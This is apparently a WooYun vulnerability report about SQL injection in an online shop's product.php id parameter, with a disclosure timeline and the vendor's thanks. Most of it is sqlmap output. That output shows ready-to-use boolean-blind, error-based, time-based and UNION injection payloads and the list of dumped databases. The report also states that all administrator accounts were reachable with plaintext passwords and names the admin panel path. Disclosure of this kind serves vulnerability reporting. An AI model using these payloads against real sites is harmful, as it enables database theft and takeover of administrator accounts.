乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-11: 细节已通知厂商并且等待厂商处理中 2015-11-20: 厂商已经确认,细节仅向厂商公开 2015-11-30: 细节向核心白帽子及相关领域专家公开 2015-12-10: 细节向普通白帽子公开 2015-12-20: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
https://**.**.**.**/product.php?id=1
---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1' AND 9995=9995 AND 'LXRb'='LXRb Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: id=1' AND (SELECT 1556 FROM(SELECT COUNT(*),CONCAT(0x71706a6a71,(SELECT (ELT(1556=1556,1))),0x716b6a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'rvJX'='rvJX Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))ILSs) AND 'ePKR'='ePKR Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: id=1' UNION ALL SELECT NULL,NULL,CONCAT(0x71706a6a71,0x5a46575464665a796352,0x716b6a7a71),NULL,NULL,NULL,NULL,NULL,NULL-- ---[17:36:20] [INFO] the back-end DBMS is MySQLweb server operating system: Windowsweb application technology: PHP 5.5.15, Apache 2.4.10back-end DBMS: MySQL 5.0[17:36:20] [INFO] fetching database names[17:36:20] [WARNING] reflective value(s) found and filtering out[17:36:20] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique[17:36:21] [WARNING] the SQL query provided does not return any output[17:36:21] [INFO] the SQL query used returns 9 entries[17:36:21] [INFO] resumed: information_schema[17:36:21] [INFO] resumed: cdcol[17:36:21] [INFO] resumed: esun[17:36:21] [INFO] resumed: esun2[17:36:21] [INFO] resumed: mysql[17:36:21] [INFO] resumed: performance_schema[17:36:21] [INFO] resumed: phpmyadmin[17:36:21] [INFO] resumed: test[17:36:21] [INFO] resumed: webauthavailable databases [9]:[*] cdcol[*] esun[*] esun2[*] information_schema[*] mysql[*] performance_schema[*] phpmyadmin[*] test[*] webauth
全部的管理人员账户
密码还是明文
商城后台地址
https://**.**.**.**/admin/
危害等级:高
漏洞Rank:18
确认时间:2015-11-20 06:35
感謝通報
暂无